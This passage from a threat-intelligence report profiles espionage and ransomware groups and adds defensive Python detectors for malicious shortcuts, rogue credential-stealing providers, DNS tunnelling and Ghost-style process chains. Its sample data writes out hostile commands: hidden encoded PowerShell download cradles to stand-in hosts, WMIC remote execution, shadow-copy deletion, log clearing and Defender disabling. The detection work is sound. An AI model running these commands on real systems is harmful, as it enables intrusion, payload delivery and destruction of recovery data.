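    hdr += struct.pack("<HHII", 0, 0, 0, 0)  # HotKey + reserved fields -> 76-byte header

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    body = s(relative_path) + s(working_dir) + s(arguments) + (s(icon) if icon else b"")
    return hdr + body + b"\x00\x00\x00\x00"  # TerminalBlock


_ENC = base64.b64encode("IEX(iwr http://198.51.100.5)".encode("utf-16-le")).decode()
SAMPLE_MALICIOUS = build_lnk(
    "..\\..\\..\\Windows\\System32\\cmd.exe",
    " " * 64 + "/c powershell -w hidden -enc " + _ENC,   # padding pushes the payload out of view
    show_command=SW_SHOWMINNOACTIVE,
    icon="%SystemRoot%\\System32\\shell32.dll")
SAMPLE_BENIGN = build_lnk("..\\Program Files\\Notepad++\\notepad++.exe", "")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, assess(parse_lnk(fh.read())) or "no findings")
```

Run it as `python lnkcheck.py *.lnk` over a mail-attachment quarantine or a user's Downloads folder. The parser skips the IDList and LinkInfo sections by their declared sizes, so it tolerates real-world shortcuts; the heuristics are deliberately simple and should be tuned against a baseline of the organization's own shortcuts before they drive blocking.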
5. CL-STA-0002 (Unattributed, Medium Confidence Nation-State)
CL-STA-0002 is an activity cluster that, while unattributed, is linked with medium confidence to nation-state actors [4]. Its primary motivation appears to be espionage, focused on credential theft and the exfiltration of confidential information [4].
Its targeting is geographically broad, affecting organizations across the U.S., the Middle East, and Africa [4]. The targeted industries are diverse, including education, real estate, retail, non-profit organizations, telecom companies, and governments [4]. This wide range suggests a broad intelligence-collection mandate.
The cluster's TTPs show a high level of sophistication and a focus on stealth and persistence. For execution and persistence it establishes backdoor capabilities with a new malware family named Agent Racoon [4]. A particularly advanced technique is a new tool called Ntospy, a Network Provider DLL module that steals user credentials by hijacking the authentication process [4]. Windows loads registered Network Provider DLLs during logon and hands them the user name and cleartext password on every interactive authentication, so Ntospy captures credentials every time a victim logs on, without touching LSASS memory and without triggering the credential-dumping detections many security products rely on. The cluster also uses a customized version of Mimikatz, named Mimilite, for credential access [4].
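As an added example (not from the Unit 42 report or from the CL-STA-0002 tooling), the script below audits the registry keys a Network Provider DLL must occupy, working from a `reg export` of the SYSTEM hive so it can run offline against an image from a suspect host. The export text, the rogue provider name "WinUpdate", and the allow-list of stock providers are assumptions for the example; the allow-list will need extending on hosts with third-party providers (VPN clients, virtualization tools).

```python
"""Audit Windows Network Provider registrations, the persistence point a
credential-stealing provider DLL has to occupy. Parses a .reg export of the
SYSTEM hive, so it runs offline. The sample export below, and the provider
name "WinUpdate", are constructed for this example."""

# Providers that ship with Windows (service name -> expected DLL basename in System32).
# Assumption for the example; extend it for third-party providers seen in your fleet.
KNOWN_PROVIDERS = {"lanmanworkstation": "ntlanman.dll", "rdpnp": "drprov.dll",
                   "webclient": "davclnt.dll"}
HKLM_ORDER = "hkey_local_machine\\system\\currentcontrolset\\control\\networkprovider\\order"
HKLM_SERVICES = "hkey_local_machine\\system\\currentcontrolset\\services\\"


def _decode_value(raw):
    """Decode the two encodings .reg files use for ProviderPath: a quoted REG_SZ, or
    hex(2): (REG_EXPAND_SZ written as comma-separated UTF-16LE bytes)."""
    if raw.startswith('"') and raw.endswith('"'):
        return "REG_SZ", raw[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    if raw.startswith("hex(2):"):
        data = bytes(int(h, 16) for h in raw[7:].split(",") if h)
        return "REG_EXPAND_SZ", data.decode("utf-16-le").rstrip("\0")
    return "OTHER", raw


def parse_reg(text):
    """Minimal .reg parser: {key (lowercased): {value name (lowercased): (type, data)}}.
    Joins the backslash-continued lines reg.exe emits for long hex values."""
    keys, cur, lines, i = {}, None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].rstrip()
        while line.endswith("\\") and i + 1 < len(lines):
            i += 1
            line = line[:-1] + lines[i].strip()
        i += 1
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].lower()
            keys[cur] = {}
        elif cur is not None and line.startswith('"') and '"=' in line:
            name, _, raw = line[1:].partition('"=')
            keys[cur][name.lower()] = _decode_value(raw)
    return keys


def audit_network_providers(reg_text):
    """Return (provider, finding) pairs for each entry in ProviderOrder that does not
    look like a stock Windows provider."""
    keys = parse_reg(reg_text)
    order = keys.get(HKLM_ORDER, {}).get("providerorder", ("", ""))[1]
    findings = []
    for name in filter(None, order.split(",")):
        entry = keys.get(HKLM_SERVICES + name.lower() + "\\networkprovider", {})
        if "providerpath" not in entry:
            findings.append((name, "in ProviderOrder but has no NetworkProvider\\ProviderPath"))
            continue
        vtype, path = entry["providerpath"]
        norm = path.lower().replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")
        base = norm.rsplit("\\", 1)[-1]
        if KNOWN_PROVIDERS.get(name.lower()) != base:
            findings.append((name, f"non-default provider DLL: {path}"))
        if not norm.startswith("c:\\windows\\system32\\"):
            findings.append((name, f"provider DLL loaded from outside System32: {path}"))
        if base == "ntoskrnl.dll":
            findings.append((name, "DLL named after the kernel image; the real kernel is "
                                   "ntoskrnl.exe and no ntoskrnl.dll ships with Windows"))
        if vtype != "REG_EXPAND_SZ":
            findings.append((name, f"ProviderPath stored as {vtype}; stock providers use "
                                   "REG_EXPAND_SZ (weak signal, typical of 'reg add' defaults)"))
    return findings


def _hex2(s):
    """Encode a string the way reg.exe exports REG_EXPAND_SZ values."""
    return "hex(2):" + ",".join(f"{b:02x}" for b in (s + "\0").encode("utf-16-le"))


# Constructed sample export: three stock providers plus one hypothetical rogue entry
# placed where the report says the Ntospy DLL was found.
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order]",
    '"ProviderOrder"="RDPNP,LanmanWorkstation,webclient,WinUpdate"',
    "",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider]",
    '"ProviderPath"=' + _hex2("%SystemRoot%\\System32\\drprov.dll"),
    "",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider]",
    '"ProviderPath"=' + _hex2("%SystemRoot%\\System32\\ntlanman.dll"),
    "",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\webclient\\NetworkProvider]",
    '"ProviderPath"=' + _hex2("%SystemRoot%\\System32\\davclnt.dll"),
    "",
    "; hypothetical rogue provider (constructed for this example)",
    "[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinUpdate\\NetworkProvider]",
    '"ProviderPath"="C:\\\\Windows\\\\Temp\\\\ntoskrnl.dll"',
])

if __name__ == "__main__":
    for provider, finding in audit_network_providers(SAMPLE_EXPORT):
        print(f"{provider}: {finding}")
```

On a live host, `reg export "HKLM\SYSTEM\CurrentControlSet" hive.reg` produces the input; the same checks can be driven from an EDR query on the two key paths. A provider whose DLL sits in System32 under the kernel's name still trips the non-default and ntoskrnl.dll checks, which is why the allow-list matters more than the path test.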
Defense evasion is a key element of its operations. The cluster uses filenames that mimic Microsoft patch naming and stores captured credentials in cleartext in files with a .msu extension, blending malicious files with legitimate-looking update artifacts [4]. The provider DLL is stored in common system paths such as C:\Windows\System32\ntoskrnl.dll or C:\Windows\Temp\ntoskrnl.dll, further aiding concealment [4]. The real Windows kernel image is ntoskrnl.exe, and no ntoskrnl.dll ships with Windows, so a file of that name in either location is itself an indicator. For command and control (C2), CL-STA-0002 employs a DNS covert channel, encrypting messages with a unique key per sample and using a fallback DNS server [4]. DNS covert channels are hard to catch with traditional network monitoring: DNS is almost always allowed outbound and is scrutinized less than HTTP/S, and because the payload is encrypted per sample, signatures on message content are of little use. The reliance on a DNS covert channel, combined with deep system compromise for credential theft, indicates a sophisticated adversary focused on long-term, low-profile access. Countering it requires endpoint detection and response (EDR) that monitors low-level system activity and behavioral anomalies, including changes to the Network Provider registry keys, together with DNS monitoring for the traffic shapes that indicate tunneling and for queries that bypass the corporate resolvers.
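Added example, not from the original report: a scorer for DNS query logs that uses the traffic's shape rather than its content, since the channel described above is encrypted per sample. The log format, resolver addresses, thresholds, and domain names are constructed assumptions; the fallback-resolver check corresponds to the report's note that the malware falls back to a second DNS server.

```python
"""Score DNS query logs for covert-channel traffic by shape: subdomain length and
entropy, cardinality of unique names per domain, record types that carry bulk
data, and queries that bypass the corporate resolvers. Log lines are constructed
for this example; resolver addresses and thresholds are assumptions to tune."""
import collections
import hashlib
import math

CORPORATE_RESOLVERS = {"10.0.0.53", "10.0.1.53"}      # assumption: the only sanctioned resolvers
BULK_RECORD_TYPES = {"TXT", "NULL", "CNAME", "MX"}     # types tunnels use to carry downstream data
THRESHOLDS = {"mean_subdomain_len": 40, "mean_entropy": 3.2, "unique_ratio": 0.8, "bulk_ratio": 0.5}
MIN_QUERIES = 20                                       # too little traffic to judge below this


def shannon_entropy(s):
    """Bits per character (hex ~3.7-4.0, base32 ~4.5-5.0, ordinary hostnames ~2.5-3.0)."""
    if not s:
        return 0.0
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname):
    """(registered_domain, subdomain) by a naive two-label rule. Production code needs
    the Public Suffix List so that names under co.uk and similar suffixes group correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_line(line):
    """Constructed log format: <epoch> <client_ip> <resolver_ip> <qtype> <qname>."""
    ts, client, resolver, qtype, qname = line.split()
    return {"ts": float(ts), "client": client, "resolver": resolver,
            "qtype": qtype.upper(), "qname": qname}


def analyse(lines):
    """Per registered domain, the list of reasons it looks like a covert channel."""
    stats = collections.defaultdict(
        lambda: {"n": 0, "names": set(), "len": 0, "ent": 0.0, "bulk": 0, "off": 0})
    for rec in map(parse_line, lines):
        domain, sub = split_name(rec["qname"])
        s = stats[domain]
        s["n"] += 1
        s["names"].add(rec["qname"])
        s["len"] += len(sub)
        s["ent"] += shannon_entropy(sub.replace(".", ""))
        s["bulk"] += rec["qtype"] in BULK_RECORD_TYPES
        s["off"] += rec["resolver"] not in CORPORATE_RESOLVERS
    verdicts = {}
    for domain, s in stats.items():
        if s["n"] < MIN_QUERIES:
            continue
        n, reasons = s["n"], []
        if s["len"] / n > THRESHOLDS["mean_subdomain_len"]:
            reasons.append(f"mean subdomain length {s['len'] / n:.0f}")
        if s["ent"] / n > THRESHOLDS["mean_entropy"]:
            reasons.append(f"mean subdomain entropy {s['ent'] / n:.2f} bits/char")
        if len(s["names"]) / n > THRESHOLDS["unique_ratio"]:
            reasons.append(f"{len(s['names'])} unique names in {n} queries (defeats caching)")
        if s["bulk"] / n > THRESHOLDS["bulk_ratio"]:
            reasons.append(f"{s['bulk']}/{n} queries for bulk-data record types")
        if s["off"]:
            reasons.append(f"{s['off']} queries sent to a non-corporate (fallback) resolver")
        verdicts[domain] = reasons
    return verdicts


def flagged_domains(lines, min_reasons=2):
    """Domains tripping at least min_reasons heuristics, most suspicious first."""
    v = analyse(lines)
    return sorted((d for d, r in v.items() if len(r) >= min_reasons), key=lambda d: -len(v[d]))


def _constructed_log():
    """Sample traffic: ordinary lookups plus an encoded-chunk tunnel using a fallback resolver."""
    lines = []
    for i in range(30):                      # benign: a few hosts, looked up repeatedly
        host = ["www", "mail", "cdn"][i % 3] + ".example.com"
        lines.append(f"{1700000000 + i} 10.0.5.21 10.0.0.53 A {host}")
    for i in range(25):                      # tunnel: 64 hex chars per query, TXT, every 5th to a fallback
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()
        resolver = "198.51.100.7" if i % 5 == 4 else "10.0.0.53"
        lines.append(f"{1700000100 + i} 10.0.5.21 {resolver} TXT "
                     f"{chunk[:32]}.{chunk[32:]}.t.telemetry.example.net")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for domain, reasons in analyse(SAMPLE_LOG).items():
        print(domain, "->", "; ".join(reasons) or "ok")
```

Feed it resolver logs or Zeek dns.log fields mapped to the five columns. The thresholds are starting points: baseline them on a week of the organization's own traffic, because CDNs and telemetry SDKs generate long, high-cardinality names legitimately and the per-domain view is what separates them from a channel that also uses TXT records and an unsanctioned resolver.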
The overall impact of its operations is the theft of user credentials and the exfiltration of confidential information [4]. The combination of advanced techniques and diverse targeting suggests a well-resourced and strategic actor.
B. Financially Motivated Threat Actors
1. Ghost (Cring) Ransomware
Ghost (Cring) ransomware actors, who are located in China, are primarily motivated by financial gain [1]. They are known by several aliases, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture [1]. Their ransom demands typically range from tens to hundreds of thousands of dollars, payable in cryptocurrency [1].
The group indiscriminately targets networks running outdated software and firmware across more than 70 countries [1]. Its victims span critical infrastructure, schools and universities, healthcare organizations, government networks, religious institutions, technology and manufacturing companies, and numerous small and medium-sized businesses [1]. This breadth highlights the pervasive risk posed by unpatched systems.
Ghost actors primarily gain initial access by exploiting public-facing applications with known Common Vulnerabilities and Exposures (CVEs) [1]. This "low-hanging fruit" strategy is the direct cause of their success. They exploit vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, together known as the ProxyShell chain) [1]. Every one of these has had a vendor patch available for years; their continued exploitation shows that failures in basic hygiene, above all patch management, lead to swift and devastating impact.
Once access is gained, Ghost actors upload a web shell to the compromised server, then use Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon, which is implanted on victim systems [1]. Persistence is not a major focus; they often proceed to ransomware deployment the same day as initial compromise, though they sporadically create new local and domain accounts and change passwords on existing accounts to keep a foothold [1]. This short dwell time means that incident-response playbooks built around extended detection and analysis periods are often insufficient; the web-shell-to-Beacon step is the point at which automated containment has to fire.
For privilege escalation, Ghost actors frequently use built-in Cobalt Strike functions to steal tokens from processes running as SYSTEM and impersonate that account, often to run Beacon with elevated privileges [1]. They also use open-source tools such as SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato to escalate through exploitation [1]. For credential access they use the Cobalt Strike "hashdump" function or Mimikatz to collect passwords and password hashes, enabling unauthorized logins and lateral movement [1].
Defense evasion includes using Cobalt Strike to list running processes in order to identify and disable antivirus software, particularly Windows Defender [1]. They also use PowerShell to hide malicious activity inside legitimate-looking command windows [1]. For discovery they use built-in Cobalt Strike commands for domain account discovery and open-source tools such as SharpShares for network-share discovery and Ladon 911 and SharpNBTScan for remote-system discovery [1]. Lateral movement relies on elevated access and Windows Management Instrumentation Command-Line (WMIC) to run PowerShell commands on additional systems, often to seed further Cobalt Strike Beacon infections; the PowerShell commands are encoded to reduce detection during lateral movement [1].
Although ransom notes often claim data exfiltration, observed exfiltration by Ghost actors is limited, with some use of Mega.nz and installed web shells [1]. The primary impact is encryption of specific directories or entire system storage with ransomware executables such as Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe [1]. These payloads hinder recovery by clearing Windows Event Logs, disabling the Volume Shadow Copy Service, and deleting shadow copies [1]. C2 relies heavily on Cobalt Strike Beacon and Team Servers communicating over HTTP and HTTPS. Notably, the actors rarely register domains for their C2 servers, instead referencing the C2 server's IP address directly in URIs, so HTTP/S traffic to a bare IP address from a server that should only talk to known hosts is a usable detection. For email communication with victims they use legitimate encrypted email services such as Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence [1].
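Added example (not CISA's code): a detection pass over process-creation events that matches the Ghost chain above, from the web shell spawning a shell under the IIS worker, through encoded PowerShell and WMIC remote execution, to shadow-copy deletion, log clearing, and Defender tampering. The event records, PIDs, paths, and the 203.0.113.5 address are constructed sample data; the rule set and ATT&CK mapping are the author's, keyed to the techniques the advisory names.

```python
"""Match the Ghost (Cring) playbook against process-creation events: web shell
child processes under an IIS worker, encoded PowerShell and download cradles,
WMIC remote process creation, shadow-copy and event-log destruction, Defender
tampering. Events are constructed Sysmon-style records, not real telemetry."""
import base64
import re

WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat8.exe",
               "tomcat9.exe", "java.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ENC_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
ATTACK = {"webshell_child_process": "T1505.003", "encoded_powershell": "T1059.001",
          "powershell_download_cradle": "T1105", "wmic_remote_process_create": "T1047",
          "shadow_copy_deletion": "T1490", "event_log_cleared": "T1070.001",
          "defender_tampering": "T1562.001"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a `powershell -enc <base64>` argument (UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return (rule, pid, detail) for every event that matches a playbook step."""
    hits = []
    for ev in events:
        img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
        low = cmd.lower()
        if parent in WEB_WORKERS and img in SHELLS:        # web shell running OS commands
            hits.append(("webshell_child_process", ev["pid"], f"{parent} -> {img}"))
        plain = decode_encoded_command(cmd) if img in SHELLS else None
        if plain is not None:                              # encoded PowerShell, decoded for the analyst
            hits.append(("encoded_powershell", ev["pid"], plain))
            if CRADLE_RE.search(plain):                    # Beacon staging from a URL
                hits.append(("powershell_download_cradle", ev["pid"], plain))
        if img == "wmic.exe" and "/node:" in low and re.search(r"process\s+call\s+create", low):
            hits.append(("wmic_remote_process_create", ev["pid"], cmd))
        if (img == "vssadmin.exe" and "delete shadows" in low) or \
                (img == "wmic.exe" and "shadowcopy delete" in low):
            hits.append(("shadow_copy_deletion", ev["pid"], cmd))
        if img == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", low):
            hits.append(("event_log_cleared", ev["pid"], cmd))
        if img in SHELLS and "set-mppreference" in low and "disable" in low:
            hits.append(("defender_tampering", ev["pid"], cmd))
    return hits


def _b64_utf16(text):
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample events in the order the advisory describes:
# web shell -> Beacon download -> lateral movement -> recovery sabotage, plus one benign event.
CRADLE = _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "cd /d C:\inetpub\wwwroot\aspnet_client & whoami"'},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -enc {CRADLE}"},
    {"pid": 4310, "parent_image": PS, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": f'wmic /node:10.10.5.12 process call create "powershell -w hidden -enc {CRADLE}"'},
    {"pid": 4402, "parent_image": PS, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 4410, "parent_image": PS, "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"pid": 4415, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"pid": 5001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{ATTACK[rule]}] {rule} pid={pid}: {detail[:80]}")
```

Each rule is cheap enough to run inline on an EDR or SIEM feed; the decoded PowerShell is returned with the hit so an analyst sees the staging URL rather than a base64 blob. Because the whole chain can complete in a day, the first two rules (web-worker child process and encoded PowerShell with a download cradle) are the ones worth wiring to automatic isolation.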
2. ToyMaker (Initial Access Broker)
ToyMaker is identified as an initial access broker (IAB), a specialized role within the cybercrime ecosystem [6]. Its motivation is purely financial: it acquires initial access to high-value organizations and sells it to secondary actors, typically ransomware gangs such as CACTUS, for monetization through double extortion [6]. This specialization reflects the professionalization of the cybercrime economy, in which different actors provide distinct services along a single attack chain.
ToyMaker's initial-access TTPs involve scanning for vulnerable systems and exploiting a large arsenal of known security flaws in internet-facing applications [6]. Once a vulnerability is found, it deploys a custom malware known as LAGTOY (also called HOLERUN) [6]. LAGTOY can create reverse shells and execute commands on infected endpoints [6]. It contacts a hard-coded command-and-control (C2) server to retrieve commands, and can create processes and run commands under specified users with the corresponding privileges [6].
After initial access and LAGTOY deployment, ToyMaker typically conducts reconnaissance and credential harvesting, often within a week [6]. For credential access it opens SSH connections to a remote host to download forensic tools such as Magnet RAM Capture, used to take a memory dump of the machine, most likely to recover credentials from it [6]. Persistence is established with tools such as OpenSSH, AnyDesk, and eHorus Agent for long-term access [6].
A defining characteristic of ToyMaker is its limited ambition: it does not typically steal data itself [6]. Its objective is solely to acquire and sell validated access to high-value organizations. This "as-a-service" model lowers the barrier to entry for other criminal groups, letting less technically proficient ransomware operators obtain compromised networks quickly. Defending against ransomware therefore means not only defending against the ransomware itself but also disrupting the upstream IAB market: eliminating the common initial-access vectors (unpatched internet-facing systems and weak credentials), and treating the appearance of an unsanctioned remote-access agent or memory-capture tool as an incident in its own right rather than as the prelude to one.
3. DragonForce Ransomware
DragonForce is a ransomware group identified in the fall of 2023 [7]. It is primarily motivated by financial gain and has displayed Russian-aligned interests, using Russian-linked infrastructure [7]. Members of other groups, such as RansomHub, have accused it of associating with the FSB, Russia's principal security and intelligence service [7].
DragonForce has significantly evolved its operating model, shifting from Ransomware-as-a-Service (RaaS) to functioning as a "ransomware cartel" [7]. This marks a move toward more organized, resilient, and collaborative criminal enterprises. As a cartel, it offers partners an 80% profit share and comprehensive infrastructure: automation of work processes, a blog, a file server, admin and client panels, 24/7 monitoring, petabytes of storage, and Kerb decryption [7]. The model gives more actors a reason to join and provides them with robust operational support, which is likely to increase both the volume and the sophistication of attacks.
The group has been highly prolific, claiming over 120 victims in the past year, with a peak of 23 victims in April 2024 [7]. Its targets span manufacturing, construction, technology, healthcare, and retail, in countries including the United States, Italy, and Australia [7].
DragonForce's initial-access TTPs include exploiting exposed credentials, phishing campaigns, and known vulnerabilities such as CVE-2024-21412 (Windows SmartScreen security-feature bypass via Internet Shortcut files), CVE-2024-21887 (command injection in Ivanti Connect Secure and Policy Secure), and CVE-2024-21893 (server-side request forgery in the SAML component of the same Ivanti products) [7]. For execution, the dragonforce.exe ransomware can be launched via Windows Command Shell commands, by abusing shared modules, or through DLL hijacking.
Works cited
1. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 25, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
2. Hackers Target Over 70 Microsoft Exchange Servers to Steal …, accessed June 25, 2025, https://thehackernews.com/2025/06/hackers-target-65-microsoft-exchange.html
3. Leviathan: Threat Actor Profile – Cyble, accessed June 25, 2025, https://cyble.com/threat-actor-profiles/leviathan/
4. New Tool Set Found Used Against Organizations in the Middle East …, accessed June 25, 2025, https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
5. Author: Mateo Mrvelj | HiSolutions Research, accessed June 25, 2025, https://research.hisolutions.com/author/mrvelj/
6. ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware …, accessed June 25, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
7. DragonForce: The Ransomware Cartel Guarding Its Burrow, accessed June 25, 2025, https://www.bitdefender.com/en-us/blog/businessinsights/dragonforce-ransomware-cartel
8. The Hidden Front: Iran, Cyber Warfare, and the Looming Threat to U.S. Critical Infrastructure, accessed June 25, 2025, https://www.cyberdefensemagazine.com/the-hidden-front-iran-cyber-warfare-and-the-looming-threat-to-u-s-critical-infrastructure/
9. Cybercriminals are Targeting Elections in India with … – Resecurity, accessed June 25, 2025, https://www.resecurity.com/blog/article/cybercriminals-are-targeting-elections-in-india-with-influence-campaigns
10. Inside the Shadows: Understanding Active Iranian APT Groups, accessed June 25, 2025, https://www.picussecurity.com/resource/blog/understanding-active-iranian-apt-groups
11. Fancy Bear spearphishing exploiting CVE-2024-11182 to deliver SpyPress – Broadcom Inc., accessed June 25, 2025, https://www.broadcom.com/support/security-center/protection-bulletin/fancy-bear-spearphishing-exploiting-cve-2024-11182-to-deliver-spypress
12. puNK-003 (Threat Actor) – Malpedia, accessed June 25, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/punk-003
13. GCMAN (Threat Actor) – Malpedia, accessed June 25, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/gcman
14. Informatika a.d. – Automation, Information Technology Company …, accessed June 25, 2025, https://www.bouncewatch.com/explore/startup/informatika-ad
15. Sport Vision Group Company Overview, Contact Details & Competitors | LeadIQ, accessed June 25, 2025, https://leadiq.com/c/sport-vision-group/5a1d95f8230000540084940b
16. SPORT VISION – CORE SA, accessed June 25, 2025, https://core-sa.com/client/sport-vision/
17. Supply Chain Data Of Sumber Rezeki Areca Company Profile | Trademo, accessed June 25, 2025, https://www.trademo.com/companies/sumber-rezeki-areca/29602058
18. Cv. Berkat Sumber Rezeki from Indonesia – Freshdi, accessed June 25, 2025, https://freshdi.com/supplier/Cv-Berkat-Sumber-Rezeki
19. BIZOUK.COM Logo & Brand Assets (SVG, PNG and … – Brandfetch, accessed June 25, 2025, https://brandfetch.com/bizouk.com
20. THREAT ALERT: DarkGate [BLOG PDF] – Cybereason, accessed June 25, 2025, https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf
21. TIM Brasil – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/TIM_Brasil
22. Corporate Profile – Telefônica RI, accessed June 25, 2025, https://ri.telefonica.com.br/en/the-company/corporate-profile/
23. pressclubofindia.org, accessed June 25, 2025, https://pressclubofindia.org/about/
24. Cybersecurity Best Practices | Cybersecurity and Infrastructure Security Agency CISA, accessed June 25, 2025, https://www.cisa.gov/topics/cybersecurity-best-practices
25. Dmitry Volkov | Group-IB Author, accessed June 25, 2025, https://www.group-ib.com/author/dmitry-volkov/
26. א.ל.כרסומטל זיווד בע”מ, accessed June 25, 2025, http://alkarso.co.il/
27. CARSOMETAL LTD., Electronic Encasements in KIRYAT ATTA – dun’sguide – דנסגייד, accessed June 25, 2025, https://www.dunsguide.co.il/en/C90880c0eba10ac11ebc16b3e90004476_carsometal/
28. to. Kersometal Packaging Ltd. / A.L. KARSOMETAL EQUIPMENT LTD – 514345255 – CheckId, accessed June 25, 2025, https://en.checkid.co.il/company/A.L.+KARSOMETAL+EQUIPMENT+LTD-YeE3rPo-514345255
29. Equipment and instrumentation – B.Z.M.T. Technology & Engineering Ltd., accessed June 25, 2025, https://www.bzmt-technology.com/Equipment-and-instrumentation/
30. Toronto – NADRA Services – Consulate General of Pakistan, accessed June 25, 2025, https://www.pakconsulate.ca/nadra
31. NADRA ID cards – Pakistan Embassy SE, accessed June 25, 2025, https://pakistanembassy.se/nicop-cnic-poc/
32. Bank Banten | Golden, accessed June 25, 2025, https://golden.com/wiki/Bank_Banten-K3D4BAJ
33. Backdoor:Java/Jacksbot.B threat description – Microsoft Security …, accessed June 25, 2025, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Java/Jacksbot.B&threatId=-2147298833
34. Iranian ‘cyber actors’ pose threat amid conflict with Israel – WPLG, accessed June 25, 2025, https://www.local10.com/news/local/2025/06/19/iranian-cyber-actors-pose-threat-amid-conflict-with-israel/
35. Defense Visual Information Distribution Service – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Defense_Visual_Information_Distribution_Service
36. SSI Securities Company Details – Investing.com India, accessed June 25, 2025, https://in.investing.com/equities/saigon-securities-incorporation-company-profile
37. Overview – SSI, accessed June 25, 2025, https://www.ssi.com.vn/en/about-ssi/Overview
38. Ministry of National Defense (Taiwan) – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Ministry_of_National_Defense_(Taiwan)
39. Defense minister meets US officials – Taipei Times, accessed June 25, 2025, https://www.taipeitimes.com/News/taiwan/archives/2025/06/19/2003838876
40. Israel Defense Forces – Wikipedia, accessed June 25, 2025, https://en.wikipedia.org/wiki/Israel_Defense_Forces
41. Bank Melli Iran – 2025 Company Profile & Competitors – Tracxn, accessed June 25, 2025, https://tracxn.com/d/companies/bank-melli-iran/__8LEC3E6hJsxapLYw2_JjfOIMshqr7NnzyVhsuVFM_aQ
42. Disdukcapil Enrekang, accessed June 25, 2025, https://disdukcapilenrekang.com/
43. ORGANIZATIONAL STRUCTURE | Dinas Kependudukan dan Pencatatan Sipil – WordPress.com, accessed June 25, 2025, https://dukcapil.wordpress.com/struktur-organisasi/
44. Bridging-Inclusion-_-Understanding-Vulnerability-in-Indonesias-CRVS-System.pdf – puskapa, accessed June 25, 2025, https://puskapa.org/assets/uploads/2021/09/Bridging-Inclusion-_-Understanding-Vulnerability-in-Indonesias-CRVS-System.pdf
45. 4 Main Threat Actor Types Explained for Better Proactive Defense – Recorded Future, accessed June 25, 2025, https://www.recordedfuture.com/threat-intelligence-101/threat-actors/threat-actor-types
